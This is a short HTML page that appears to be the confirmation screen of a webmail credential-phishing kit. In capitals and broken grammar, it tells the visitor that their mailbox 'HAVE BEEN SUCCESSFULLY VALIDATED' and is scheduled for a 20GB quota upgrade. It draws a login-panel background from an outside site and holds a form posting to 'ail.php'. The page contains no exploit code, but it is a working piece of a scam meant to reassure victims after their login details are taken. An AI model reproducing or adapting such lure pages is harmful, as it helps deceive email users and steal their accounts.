<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'>
<html><head><title>SUCCESSFULLY VALIDATED</title>
<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-15'/>
<link rel='stylesheet' type='text/css' href='http://www.outitgoes.com/default.css' />
<!-- no core stylesheet -->
</head>

<body class='centre' style='margin-top: 32px; text-align: centre; background: #fff'>
<div style='border: none; margin-right: auto; margin-left: auto; width: 447px; height: 436px; padding: 10px; background: url("http://www.outitgoes.com/login_panel_gradient.jpg") top center no-repeat'>
<form method='post' action='ail.php'>
			<div>
			<h1>YOUR MAILBOX HAVE BEEN SUCCESSFULLY VALIDATED.</h1>
			<h2>YOUR MAILBOX QUOTA HAVE BEEN SCHEDUELED FOR ADDITIONAL 20GB UPGRADE ACTIVE WITHIN 24 HOURS..</h2>
			
			</div></form>
</div>


</body></html><!-- 1 -->